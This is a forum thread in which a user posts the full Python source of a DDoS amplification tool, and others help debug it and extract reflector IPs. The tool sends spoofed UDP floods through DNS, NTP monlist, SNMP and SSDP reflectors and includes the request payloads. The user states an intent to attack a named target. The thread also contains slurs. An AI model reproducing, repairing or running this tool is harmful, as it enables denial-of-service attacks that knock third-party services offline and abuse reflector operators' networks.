Someone help me get this thing going.
-
2015-10-20 at 6:47 PM UTC
So i was messing around with this amplification script i found and after installing the dependencies
i tried to run it. One of its dependencies is pinject and the script said at the top:
from pinject import IP,UDP
But that gave an error so i simply changed it to:
import pinject
It ran but after passing the proper arguments and such i got a new error.
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\PentestBox\bin\amplify.py", line 266, in __attack
size, _ = self.GetAmpSize(proto, soldier)
File "C:\PentestBox\bin\amplify.py", line 199, in GetAmpSize
sock.sendto(packet, (soldier, PORT[proto]))
gaierror: [Errno 11004] getaddrinfo failed
An error in my threading lib? I don't know what's going on maybe you can help me out?
Here's the script i'm trying to run.
#!/usr/bin/env python
import sys
import time
import socket
import struct
import threading
from random import randint
from optparse import OptionParser
import pinject
#from pinject import IP, UDP
USAGE = '''
%prog target.com [options] # DDoS
%prog benchmark [options] # Calculate AMPLIFICATION factor
'''
LOGO = r'''
_____ __ __
/ ___/____ _____/ /___/ /___ _____ ___
\__ \/ __ `/ __ / __ / __ `/ __ `__ \
___/ / /_/ / /_/ / /_/ / /_/ / / / / / /
/____/\__,_/\__,_/\__,_/\__,_/_/ /_/ /_/
https://github.com/OffensivePython/Saddam
https://twitter.com/OffensivePython
'''
HELP = (
'DNS Amplification File and Domains to Resolve (e.g: dns.txt:[evildomain.com|domains_file.txt]',
'NTP Amplification file',
'SNMP Amplification file',
'SSDP Amplification file',
'Number of threads (default=1)' )
OPTIONS = (
(('-d', '--dns'), dict(dest='dns', metavar='FILE:FILE|DOMAIN', help=HELP[0])),
(('-n', '--ntp'), dict(dest='ntp', metavar='FILE', help=HELP[1])),
(('-s', '--snmp'), dict(dest='snmp', metavar='FILE', help=HELP[2])),
(('-p', '--ssdp'), dict(dest='ssdp', metavar='FILE', help=HELP[3])),
(('-t', '--threads'), dict(dest='threads', type=int, default=1, metavar='N', help=HELP[4])) )
BENCHMARK = (
'Protocol'
'| IP Address '
'| Amplification '
'| Domain '
'\n{}').format('-'*75)
ATTACK = (
' Sent '
'| Traffic '
'| Packet/s '
'| Bit/s '
'\n{}').format('-'*63)
# UDP destination port used for each supported protocol.
PORT = {
'dns': 53,
'ntp': 123,
'snmp': 161,
'ssdp': 1900 }
# One request template per protocol. Each is a small UDP request whose reply
# can be far larger than the request itself. Decoded from the bytes below,
# with what the operator of the answering service can do about it:
#   dns  - header with RD set, QDCOUNT=1, ARCOUNT=1; the two '{}' slots take
#          the 2-byte ID and the encoded QNAME; QTYPE=255 (ANY), QCLASS=255;
#          followed by an EDNS0 OPT record advertising a 4096-byte UDP size.
#          Hardening: no open recursion, response rate limiting, minimal
#          answers to ANY (RFC 8482).
#   snmp - SNMPv2c GetBulkRequest, community "public", max-repetitions 127,
#          OID 1.3.6.1.2.1. Hardening: no default community string, ACL the
#          agent, keep UDP/161 off the Internet.
#   ntp  - mode 7 (private) request, request code 0x2a (monlist).
#          Hardening: disable the monitor facility or restrict queries
#          (e.g. `restrict ... noquery`), run a current ntpd.
#   ssdp - M-SEARCH for ssdp:all. Hardening: never expose UDP/1900 on a
#          WAN-facing interface.
# These fixed byte patterns are also usable as match strings when looking
# for this traffic in flow or packet captures.
PAYLOAD = {
'dns': ('{}\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01'
'{}\x00\x00\xff\x00\xff\x00\x00\x29\x10\x00'
'\x00\x00\x00\x00\x00\x00'),
'snmp':('\x30\x26\x02\x01\x01\x04\x06\x70\x75\x62\x6c'
'\x69\x63\xa5\x19\x02\x04\x71\xb4\xb5\x68\x02\x01'
'\x00\x02\x01\x7F\x30\x0b\x30\x09\x06\x05\x2b\x06'
'\x01\x02\x01\x05\x00'),
'ntp':('\x17\x00\x02\x2a'+'\x00'*4),
'ssdp':('M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n'
'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n')
}
# Per-protocol cache of measured reply sizes, filled in by DDoS.__attack:
#   amplification['dns'][host][domain] = size
#   amplification[<other proto>][host] = size
# The stored value is the reply length in bytes, not a ratio.
amplification = {
'dns': {},
'ntp': {},
'snmp': {},
'ssdp': {} } # Amplification factor
# Positions inside each files[proto] list: [file_name, file_handle].
FILE_NAME = 0 # Index of files names
FILE_HANDLE = 1 # Index of files descriptors
# Module-level counters: written by the sender threads (declared `global` in
# DDoS.__attack) and read by Monitor(). No lock is taken around them.
npackets = 0 # Number of packets sent
# Incremented by the cached probe reply size for every packet sent, so this is
# an estimate of reflected volume, not a measurement of real traffic.
nbytes = 0 # Number of bytes reflected
# Maps protocol name -> [list file name] (a file handle is appended later).
files = {} # Amplifications files
# Magnitude suffix indexed by the number of divisions Calc() performed.
# Only indexes 0-4 exist.
SUFFIX = {
0: '',
1: 'K',
2: 'M',
3: 'G',
4: 'T'}
def Calc(n, d, unit=''):
    """Format *n* as a scaled number with a magnitude suffix.

    *n* is converted to float and divided by *d* repeatedly while the
    quotient is still at least 1. The number of divisions selects the
    suffix from the module-level SUFFIX table ('', K, M, G, T), and *unit*
    is appended after it. The value is printed with two decimals.

    Raises KeyError if more than four divisions are needed, because SUFFIX
    only has entries for 0 through 4.
    """
    value = float(n)
    steps = 0
    while value / d >= 1:
        value /= d
        steps += 1
    return '{:.2f}{}{}'.format(value, SUFFIX[steps], unit)
def GetDomainList(domains):
    """Turn the domain argument into a list of domain names.

    If the argument contains ".txt" anywhere (case-insensitive substring
    test on the whole value), it is treated as a path: the file is read,
    carriage returns and spaces are stripped, and every non-empty line is
    returned. Otherwise the argument is split on commas and returned as is.
    """
    if '.TXT' not in domains.upper():
        return domains.split(',')
    handle = open(domains, 'r')
    raw = handle.read()
    handle.close()
    cleaned = raw.replace('\r', '').replace(' ', '')
    return [entry for entry in cleaned.split('\n') if entry]
# Status loop run in the main thread while the sender threads are active.
# Once a second it reads the module-level counters npackets and nbytes and
# writes one line of totals and per-second rates to stderr.
# Note that nbytes is not observed traffic: the sender threads add the reply
# size recorded during probing for each packet they send, so the "Traffic"
# and "Bit/s" columns are estimates.
# The loop ends on Ctrl-C or on any exception, after printing a message.
def Monitor():
'''
Monitor attack
'''
print ATTACK
FMT = '{:^15}|{:^15}|{:^15}|{:^15}'
start = time.time()
while True:
try:
# Seconds elapsed since the loop started; used as the rate denominator.
current = time.time() - start
bps = (nbytes*8)/current
pps = npackets/current
out = FMT.format(Calc(npackets, 1000),
Calc(nbytes, 1024, 'B'), Calc(pps, 1000, 'pps'), Calc(bps, 1000, 'bps'))
# '\r' rewrites the same terminal line; the padding clears leftovers.
sys.stderr.write('\r{}{}'.format(out, ' '*(60-len(out))))
time.sleep(1)
except KeyboardInterrupt:
print '\nInterrupted'
break
except Exception as err:
print '\nError:', str(err)
break
def AmpFactor(recvd, sent):
    """Render a reply/request size pair as '<ratio>x (<sent>B -> <recvd>B)'.

    The ratio is recvd/sent using the interpreter's own '/' semantics
    (integer division for ints under Python 2).
    """
    ratio = recvd/sent
    template = '{}x ({}B -> {}B)'
    return template.format(ratio, sent, recvd)
# Measurement-only mode: for every host in each configured list file, send one
# request via ddos.GetAmpSize() and print reply size against request size.
# Only GetAmpSize() is called here. It uses an ordinary UDP socket, so every
# listed host is contacted directly from this machine's real address and can
# log it. No spoofed packets are sent in this mode.
# ddos: a DDoS instance; its .domains list is used for the DNS rows.
def Benchmark(ddos):
print BENCHMARK
# Running count of probes performed across all protocols.
i = 0
for proto in files:
f = open(files[proto][FILE_NAME], 'r')
while True:
# One host per line; an empty line or end of file stops this protocol.
soldier = f.readline().strip()
if soldier:
if proto=='dns':
for domain in ddos.domains:
i+= 1
recvd, sent = ddos.GetAmpSize(proto, soldier, domain)
# Python 2 integer division: true only when the reply is at least as
# large as the request, so smaller or empty replies are not printed.
if recvd/sent:
print '{:^8}|{:^15}|{:^23}|{}'.format(proto, soldier,
AmpFactor(recvd, sent), domain)
else:
continue
else:
recvd, sent = ddos.GetAmpSize(proto, soldier)
print '{:^8}|{:^15}|{:^23}|{}'.format(proto, soldier,
AmpFactor(recvd, sent), 'N/A')
i+= 1
else:
break
print 'Total tested:', i
f.close()
# Holds the run parameters and the probe/send logic.
# Two kinds of traffic leave this class, which matters for attribution:
#   * GetAmpSize() probes use a normal UDP socket and therefore carry the
#     sender's real source address.
#   * __send() writes hand-built IP/UDP headers to a raw socket (per its
#     docstring, a spoofed packet).
# In __attack every host is probed with GetAmpSize() before __send() is used
# against it, so a listed host sees an un-spoofed request first.
class DDoS(object):
# target:  address placed in the hand-built headers by __send
# threads: number of worker threads started by stress()
# domains: list of names used for the DNS queries (may be None)
# event:   threading.Event; workers loop while it is set
def __init__(self, target, threads, domains, event):
self.target = target
self.threads = threads
self.event = event
self.domains = domains
# Start self.threads worker threads, each running __attack. The threads are
# not joined here and are not marked as daemon threads.
def stress(self):
for i in range(self.threads):
t = threading.Thread(target=self.__attack)
t.start()
# Builds UDP and IP headers with the pinject helpers and writes header plus
# payload to the raw socket. self.target and soldier are passed to both
# helpers - presumably as source and destination address; pinject's
# signatures are not visible in this listing, confirm there. The UDP source
# port is random per packet.
# Defensive context: forged source addresses are dropped at the network edge
# where source-address validation (BCP 38 / uRPF) is enforced.
def __send(self, sock, soldier, proto, payload):
'''
Send a Spoofed Packet
'''
udp = UDP(randint(1, 65535), PORT[proto], payload).pack(self.target, soldier)
ip = IP(self.target, soldier, udp, proto=socket.IPPROTO_UDP).pack()
sock.sendto(ip+udp+payload, (soldier, PORT[proto]))
# Sends one request for `proto` to `soldier` and returns the tuple
# (reply length in bytes, request length in bytes).
# Uses socket.SOCK_DGRAM, i.e. a regular UDP socket with a 2 second timeout,
# so the request carries the caller's real address.
# `soldier` is passed to sendto() unchanged; a value that is not a plain host
# name or IP address makes name resolution fail (socket.gaierror).
def GetAmpSize(self, proto, soldier, domain=''):
'''
Get Amplification Size
'''
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
data = ''
# ntp/ssdp: keep reading datagrams until the timeout fires and sum them.
if proto in ['ntp', 'ssdp']:
packet = PAYLOAD[proto]
sock.sendto(packet, (soldier, PORT[proto]))
try:
while True:
data+= sock.recvfrom(65535)[0]
except socket.timeout:
sock.close()
return len(data), len(packet)
# dns/snmp: a single datagram is read; a timeout counts as an empty reply.
if proto=='dns':
packet = self.__GetDnsQuery(domain)
else:
packet = PAYLOAD[proto]
try:
sock.sendto(packet, (soldier, PORT[proto]))
data, _ = sock.recvfrom(65535)
except socket.timeout:
data = ''
finally:
sock.close()
return len(data), len(packet)
# Encodes a dotted name as length-prefixed labels. Empty labels are skipped
# and no terminating zero byte is added here (the DNS template supplies it).
def __GetQName(self, domain):
'''
QNAME A domain name represented as a sequence of labels
where each label consists of a length
octet followed by that number of octets
'''
labels = domain.split('.')
QName = ''
for label in labels:
if len(label):
QName += struct.pack('B', len(label)) + label
return QName
# Fills the DNS template with a random 16-bit ID and the encoded name.
# struct format 'H' uses native byte order.
def __GetDnsQuery(self, domain):
id = struct.pack('H', randint(0, 65535))
QName = self.__GetQName(domain)
return PAYLOAD['dns'].format(id, QName)
# Worker loop. Opens every configured list file, then cycles through the
# hosts for as long as self.event is set, rewinding a file when it is
# exhausted. A host is probed once with GetAmpSize() and the reply size is
# cached in `amplification`; later packets to it reuse the cached size to
# advance the nbytes estimate. Opening SOCK_RAW/IPPROTO_RAW normally
# requires administrative privileges.
def __attack(self):
global npackets
global nbytes
_files = files
for proto in _files: # Open Amplification files
f = open(_files[proto][FILE_NAME], 'r')
_files[proto].append(f) # _files = {'proto':['file_name', file_handle]}
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
i = 0
while self.event.isSet():
for proto in _files:
soldier = _files[proto][FILE_HANDLE].readline().strip()
if soldier:
if proto=='dns':
if not amplification[proto].has_key(soldier):
amplification[proto][soldier] = {}
for domain in self.domains:
if not amplification[proto][soldier].has_key(domain):
size, _ = self.GetAmpSize(proto, soldier, domain)
# No reply at all: stop trying further domains against this host.
if size==0:
break
# Reply smaller than the template: skip this domain.
elif size<len(PAYLOAD[proto]):
continue
else:
amplification[proto][soldier][domain] = size
amp = self.__GetDnsQuery(domain)
self.__send(sock, soldier, proto, amp)
npackets += 1
i+=1
nbytes += amplification[proto][soldier][domain]
else:
if not amplification[proto].has_key(soldier):
size, _ = self.GetAmpSize(proto, soldier)
if size<len(PAYLOAD[proto]):
continue
else:
amplification[proto][soldier] = size
amp = PAYLOAD[proto]
npackets += 1
i+=1
nbytes += amplification[proto][soldier]
self.__send(sock, soldier, proto, amp)
else:
# End of the list file: rewind and start over on the next pass.
_files[proto][FILE_HANDLE].seek(0)
sock.close()
for proto in _files:
_files[proto][FILE_HANDLE].close()
# Command-line entry point. Parses the options declared in OPTIONS, records
# the list file for each selected protocol in the module-level `files` dict,
# and then runs one of two modes depending on the first positional argument:
#   * "benchmark" (any case): Benchmark() only probes the listed hosts with
#     ordinary UDP requests from this machine's own address.
#   * anything else: treated as a host name, resolved once with
#     socket.gethostbyname(), and passed to DDoS as the target.
# With no positional argument or no protocol option, the help text is
# printed and the program exits.
def main():
parser = OptionParser(usage=USAGE)
for args, kwargs in OPTIONS:
parser.add_option(*args, **kwargs)
options, args = parser.parse_args()
domains = None
if len(args)<1:
parser.print_help()
sys.exit()
if options.dns:
# Expected form is FILE:FILE|DOMAIN. The value is split on ':' and unpacked
# into exactly two names.
dns_file, domains = options.dns.split(':')
domains = GetDomainList(domains)
if domains:
files['dns'] = [dns_file]
else:
print 'Specify domains to resolve (e.g: --dns=dns.txt:evildomain.com)'
sys.exit()
if options.ntp:
files['ntp'] = [options.ntp]
if options.snmp:
files['snmp'] = [options.snmp]
if options.ssdp:
files['ssdp'] = [options.ssdp]
if files:
# Worker threads keep running while this event is set.
event = threading.Event()
event.set()
if 'BENCHMARK'==args[0].upper():
ddos = DDoS(args[0], options.threads, domains, event)
Benchmark(ddos)
else:
ddos = DDoS(socket.gethostbyname(args[0]), options.threads, domains, event)
ddos.stress()
# Monitor() blocks until interrupted; clearing the event then stops workers.
Monitor()
event.clear()
else:
parser.print_help()
sys.exit()
if __name__=='__main__':
print LOGO
main()
Any ideas on what's going wrong? -
2015-10-20 at 11:32 PM UTCwhat error did it throw for from pinject import IP,UDP? if importing those classes specifically failed but importing the full lib worked, there might be something wrong with those particular classes... maybe the version you're using is too old/new and the required classes are named differently or something.
looks like the specific error that's tripping is getaddrinfo failed, though I always have trouble reading Python errors. that would indicate that it's part of the ip connection process failing, again likely pointing at the IP class in pinject -
2015-10-21 at 11:40 AM UTC
what error did it throw for from pinject import IP,UDP? if importing those classes specifically failed but importing the full lib worked, there might be something wrong with those particular classes… maybe the version you're using is too old/new and the required classes are named differently or something.
Traceback (most recent call last):
File "C:\PentestBox\bin\amplify.py", line 10, in <module>
from pinject import IP, UDP
ImportError: cannot import name IP
That's the error i get when i keep the import as the original.
[QUOTE=aldra;n37549]
looks like the specific error that's tripping is [b]getaddrinfo failed[/b], though I always have trouble reading Python errors. that would indicate that it's part of the ip connection process failing, again likely pointing at the IP class in pinject
[/QUOTE]
Right, i installed pinject with pip but now i can't find the thing anymore so i can't go look in the script for the offending or rather non existent classes so that sucks.
-
2015-10-21 at 11:48 AM UTCFound pinject on github.
https://github.com/OffensivePython/Pinject/blob/master/pinject.py
If this is the one i got with pip then i should be set... -
2015-10-21 at 3:11 PM UTCSophie mate, you need to really supply me with some of yo Python stuff.
-
2015-10-21 at 3:25 PM UTCyeah, based on that the copy of the library you had was missing the IP class (or it was named something else)... might want to do a quick search through it for the getaddrinfo function to see what it's attached to.
another thing to keep in mind is that python 2 and 3 source files are incompatible with one another (mostly whitespace/formatting faggotry), so you might want to verify your source and libs are written in the same version. -
2015-10-21 at 4:08 PM UTC
Sophie mate, you need to really supply me with some of yo Python stuff.
Nigga' i post metric shit tons of python stuff here in T&T. However if you need something specific one need only ask.yeah, based on that the copy of the library you had was missing the IP class (or it was named something else)… might want to do a quick search through it for the getaddrinfo function to see what it's attached to.
Now to find the damned thing i literally have over 9000 libs.another thing to keep in mind is that python 2 and 3 source files are incompatible with one another (mostly whitespace/formatting faggotry), so you might want to verify your source and libs are written in the same version.
Yes, i work exclusively in 2.7 that they're not cross compatible is gay as fuck. -
2015-10-21 at 4:09 PM UTCNothing to do with threading, the thread lib is always going to be at the top of the stack in a threaded program.
Looking at the source of that github link and what pip has it looks like they're totally different programs. I'd uninstall the pip package and download a local copy from github and use that.
The getaddrinfo is probably due to a bad domain. Try to print out `soldier` and `PORT[proto]` just above line 199, they should be a valid domain or IP and port combo. -
2015-10-21 at 4:27 PM UTCSo here's a twist, turns out the lib i downloaded with pip is unrelated to the lib required by the amp script. The pinject i found on github is the one required by the amp script i put them both in my pentestbox directory and everything is fine. I'm gonna' benchmark with SSDP amp see how much bandwdith i'mma pull.
-
2015-10-21 at 4:44 PM UTC
Nothing to do with threading, the thread lib is always going to be at the top of the stack in a threaded program.
Looking at the source of that github link and what pip has it looks like they're totally different programs. I'd uninstall the pip package and download a local copy from github and use that.
The getaddrinfo is probably due to a bad domain. Try to print out `soldier` and `PORT[proto]` just above line 199, they should be a valid domain or IP and port combo.
Yes you beat me to it. I was about to post this.Fuck me.
Traceback (most recent call last):
File "C:\PentestBox\bin\amplify.py", line 321, in <module>
main()
File "C:\PentestBox\bin\amplify.py", line 309, in main
Benchmark(ddos)
File "C:\PentestBox\bin\amplify.py", line 163, in Benchmark
recvd, sent = ddos.GetAmpSize(proto, soldier)
File "C:\PentestBox\bin\amplify.py", line 198, in GetAmpSize
sock.sendto(packet, (soldier, PORT[proto]))
socket.gaierror: [Errno 11004] getaddrinfo failed
Right so socket.gaierror means the given host name is invalid. ANd if i look at the code in the script i see this:
def GetAmpSize(self, proto, soldier, domain=''):
'''
Get Amplification Size
'''
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
data = ''
if proto in ['ntp', 'ssdp']:
packet = PAYLOAD[proto]
sock.sendto(packet, (soldier, PORT[proto]))
try:
while True:
data+= sock.recvfrom(65535)[0]
except socket.timeout:
sock.close()
return len(data), len(packet)
Line 198 is:
sock.sendto(packet, (soldier, PORT[proto]))
So if i get this right it can't send muh packet defined as PAYLOAD because my hostname in sock.sendto is invalid.Sock is defined in my code as follows:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Which means a socket on an IPv4 address under protocol so and so (I forgot what DGRAM is for at the moment) and sendto is defined elsewhere. But why does it say my host name is invalid?
God damn it.
But i'll print the stuff you mentioned. -
2015-10-21 at 4:50 PM UTC
Nothing to do with threading, the thread lib is always going to be at the top of the stack in a threaded program.
Looking at the source of that github link and what pip has it looks like they're totally different programs. I'd uninstall the pip package and download a local copy from github and use that.
The getaddrinfo is probably due to a bad domain. Try to print out `soldier` and `PORT[proto]` just above line 199, they should be a valid domain or IP and port combo.
Soldier: 1.169.169.206 308
Port: 1900
Is the result and i'll be darned because that's the first entry in my SSDP amp list and a port which means my amp list is misformatted. Thanks lan [size=7]<3[/size] You rock.
Now someone make me a grep regular expression to pull only the IP's out of muh amp list. -
2015-10-21 at 5:01 PM UTCGot a grep already. Here it is if anyone is interested.
egrep -o "([0-9]{1,3}[.]){3}[0-9]{1,3}" -
2015-10-21 at 5:09 PM UTCNo prob. From within python, assuming the addresses are all IPv4 and have a port listed:
>>> import re >>> s = "1.169.169.206 308\n192.168.0.1 8080"
>>> ips = [re.match('([0-9.]+) (.*)', x).group(1) for x in s.split('\n')]
>>> ips
['1.169.169.206', '192.168.0.1']
>>> -
2015-10-21 at 5:12 PM UTCToo bad my terminal only outputs 1000 lines -_-.
-
2015-10-21 at 5:26 PM UTC
No prob. From within python, assuming the addresses are all IPv4 and have a port listed:
>>> import re >>> s = "1.169.169.206 308\n192.168.0.1 8080"
>>> ips = [re.match('([0-9.]+) (.*)', x).group(1) for x in s.split('\n')]
>>> ips
['1.169.169.206', '192.168.0.1']
>>>
What is this going to do exactly? Match up SSDP IPs with a local IP? Also am i supposed to do this for the 15.000 SSDP IP's i have? Because i'm gonna' need some automation for that. -
2015-10-21 at 6 PM UTC
Nigga' i post metric shit tons of python stuff here in T&T. However if you need something specific one need only ask.
Well, if you'd be down to help me code a Fallout terminal thing, I need to know because I barely know Python. -
2015-10-21 at 6:04 PM UTC
Well, if you'd be down to help me code a Fallout terminal thing, I need to know because I barely know Python.
>fallout terminal thing
Gonna' need to be a little more specific than that. What do you need it to do? -
2015-10-21 at 6:22 PM UTC
>fallout terminal thing
Gonna' need to be a little more specific than that. What do you need it to do?
Look under my Fallout 3 PipBoy in DIY I might've explained it in there. -
2015-10-21 at 6:30 PM UTC
Look under my Fallout 3 PipBoy in DIY I might've explained it in there.
Alright. -
2015-10-21 at 9:19 PM UTCOk so after arranging a better formatted SSDP server list i got benchmarking to work.
It calculates the amplification factor in this mode and as you can see not a lot of that going on but i'll chalk that up to shitty servers in my list. However after i configured a proper target to fire my laz0rz at it threw a:
[SIZE=48px]DIVISION BY ZERO![/SIZE]
Error. Instantly after that the Universe impoded but after reconfiguring the space-time continuüm i was able to go to github and github told me the following.
'From line 124 to 130:'
start = time.time()
while True:
try:
current = time.time()
start bps = (nbytes*8) / current pps = npackets/current
when this chunk of code gets executed fast enough, current is 0 and python throws and exception about float division error.
example Solution: setting current to non-zero value eg. 1 when it is 0.
Now my question obviously is, how do i set 'the current to non-zero value eg. 1 when it is 0.'
When this finally works i'm gonna' DDoS LLZ to celebrate.